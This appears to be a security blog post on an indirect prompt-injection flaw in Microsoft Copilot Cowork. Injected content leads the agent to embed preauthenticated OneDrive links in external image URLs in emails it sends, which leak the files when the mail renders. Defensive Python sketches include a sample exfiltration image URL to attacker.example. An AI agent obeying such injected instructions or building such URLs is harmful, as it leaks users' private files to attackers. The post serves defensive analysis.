Copilot Cowork Leaks OneDrive Files Through Prompt Injection

An AI agent that can email your own inbox without asking permission sounds, in theory, like a productivity feature. In practice, that same mechanism became a file exfiltration vector in Microsoft Copilot Cowork, the AI-assisted collaboration product Microsoft launched in March 2026. Simon Willison publicly documented the issue on his blog on May 26, with the original technical analysis published by Prompt Armor.

What Happened

Copilot Cowork allows AI agents to send messages to the user's mailbox as part of automated workflows. The problem: those messages could contain external images, and loading them triggered network requests to attacker-controlled domains. Because OneDrive can generate preauthenticated download links, a well-crafted prompt injection could make the agent embed one of those links in an image URL. When the user opened the email, the mail client loaded the image, and the attacker's server received the link, and with it direct access to the file.

The entire flow required no suspicious user clicks or attachment downloads. Simply opening the message the agent had sent was enough.
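The shape of that channel can be made concrete with a small detection sketch. It is an illustration under stated assumptions, not Microsoft's or Prompt Armor's tooling: it scans an HTML email body for image URLs whose query string carries another URL, which is the pattern described above. The function name `suspicious_image_urls` and every domain in the example are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl


class ImgSrcCollector(HTMLParser):
    """Collects the src attribute of every <img> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def suspicious_image_urls(html_body):
    """Return image URLs whose query string carries another URL.

    Hypothetical heuristic: a link smuggled out through an image request
    usually appears as a (percent-encoded) query parameter value.
    """
    collector = ImgSrcCollector()
    collector.feed(html_body)
    flagged = []
    for src in collector.sources:
        query = urlsplit(src).query
        # parse_qsl percent-decodes values, so an encoded link is still caught.
        for _, value in parse_qsl(query, keep_blank_values=True):
            if value.lower().startswith(("http://", "https://")):
                flagged.append(src)
                break
    return flagged


# Example with made-up domains: the first image leaks a link, the second does not.
body = (
    '<p>Weekly summary</p>'
    '<img src="https://attacker.example/p.png?d=https%3A%2F%2Ffiles.example%2Fshare%3Ftoken%3Dabc">'
    '<img src="https://cdn.example/logo.png?v=2">'
)
print(suspicious_image_urls(body))
```

A heuristic like this only catches the obvious encoding. An attacker could just as well place the link in the URL path or encode it differently, which is why blocking the image load itself is the more reliable control.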

Why This Case Represents a Broader Problem

This incident is not an isolated case of poor implementation: it illustrates a structural tension in agentic system design. When an agent has permissions to act (send emails, create links, access storage) without requiring human confirmation at each step, the blast radius of a prompt injection attack expands considerably.

Indirect prompt injection works here in textbook fashion: a document or message the agent processes contains malicious instructions that redirect its behavior. The agent cannot distinguish between legitimate system instructions and adversarial content embedded in the data it handles. The novelty is that the exfiltration channel (an external image in a rendered email) is completely passive from the user's perspective.

As Willison points out, the core challenge in agentic system design remains exactly this: preventing attackers from exploiting the agent's permissions to move data outside the controlled environment.

Who This Affects

The issue primarily impacts organizations that have adopted Copilot Cowork in environments with sensitive data in OneDrive: legal teams, finance, HR, or any department where corporate documents have value to an external attacker. This is not a theoretical risk confined to lab scenarios; the attack is executable by anyone who can introduce malicious content into the agent's workflow, whether through a received email, a shared document, or a delegated task.

Security teams evaluating or already deploying Microsoft's agentic tools should review what permissions their agents have to generate and send communications without explicit approval, and how the email client renders AI-generated content.

What Should Change

The Prompt Armor analysis points in the right direction: agents operating with access to sensitive storage should not be able to generate preauthenticated links or send external communications without a human approval step. Rendering external images in agent-generated messages is, at this point, a known risk that should be blocked by default.
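As a rough sketch of what "blocked by default" could look like on the rendering side, the snippet below drops every image from an agent-generated HTML body unless it is served over HTTPS from an allowlisted host. It is an assumption-laden illustration, not how any Microsoft mail client works: the `ExternalImageStripper` class, the `strip_external_images` helper, and the allowlisted host are all hypothetical, and only `<img>` tags are handled (CSS backgrounds and other remote resources would need the same treatment).

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would define its own.
ALLOWED_IMAGE_HOSTS = {"assets.intranet.example"}


class ExternalImageStripper(HTMLParser):
    """Re-emits HTML while dropping <img> tags that point at non-allowlisted hosts."""

    def __init__(self, allowed_hosts):
        # Keep character references as written so the output round-trips.
        super().__init__(convert_charrefs=False)
        self.allowed_hosts = allowed_hosts
        self.out = []
        self.removed = []

    def _is_allowed(self, attrs):
        src = dict(attrs).get("src") or ""
        try:
            parts = urlsplit(src)
        except ValueError:
            return False  # malformed URL: treat as untrusted
        # Only absolute https URLs on allowlisted hosts survive.
        return parts.scheme == "https" and parts.hostname in self.allowed_hosts

    def handle_starttag(self, tag, attrs):
        if tag == "img" and not self._is_allowed(attrs):
            self.removed.append(dict(attrs).get("src"))
            return
        self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        # Self-closing tags: emit the original text once, with no extra end tag.
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def strip_external_images(html_body, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return (sanitized_html, removed_image_sources)."""
    stripper = ExternalImageStripper(allowed_hosts)
    stripper.feed(html_body)
    stripper.close()
    return "".join(stripper.out), stripper.removed
```

Returning the removed sources alongside the cleaned body lets the caller log what was blocked, which ties into the audit trail discussed next. Comments and doctype declarations are dropped by this sketch, which is acceptable for a message body but would need handling in a general-purpose sanitizer.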

At ElephantPink, we have been emphasizing for months that the agent permissions model needs the same rigor we apply to third-party APIs: least privilege, explicit approval for actions with external effects, and audit trails of what the agent has generated. This Copilot Cowork case is a reminder that operational convenience and security still pull in opposite directions, and that no provider has fully solved that equation yet.
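Those three principles can be sketched in a few lines. The example below is a minimal illustration with invented names, not an API of Copilot Cowork or any other product: `AgentPolicy`, the action names, and the decision strings are all hypothetical. Actions outside the agent's grant are denied, actions with external effects wait for a named human approver, and every decision is appended to an audit log.

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Hypothetical action names for operations that reach outside the tenant.
EXTERNAL_EFFECT_ACTIONS = {"send_email", "create_share_link"}


@dataclass
class AgentPolicy:
    """Least privilege + approval for external effects + audit trail (sketch)."""

    allowed_actions: set
    audit_log: list = field(default_factory=list)

    def authorize(self, action, detail, approved_by=None):
        if action not in self.allowed_actions:
            decision = "denied"  # least privilege: not granted at all
        elif action in EXTERNAL_EFFECT_ACTIONS and approved_by is None:
            decision = "pending_approval"  # needs a human before it runs
        else:
            decision = "allowed"
        # Record every decision, including denials, for later review.
        self.audit_log.append({
            "time": datetime.now(timezone.utc).isoformat(),
            "action": action,
            "detail": detail,
            "approved_by": approved_by,
            "decision": decision,
        })
        return decision


policy = AgentPolicy(allowed_actions={"read_file", "send_email"})
print(policy.authorize("read_file", "q3.xlsx"))
print(policy.authorize("send_email", "summary to owner"))
print(policy.authorize("send_email", "summary to owner", approved_by="alice"))
print(policy.authorize("create_share_link", "q3.xlsx"))
```

In this sketch the agent was never granted `create_share_link`, so a prompt injection asking for a preauthenticated link is refused outright instead of relying on the approver to notice it.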
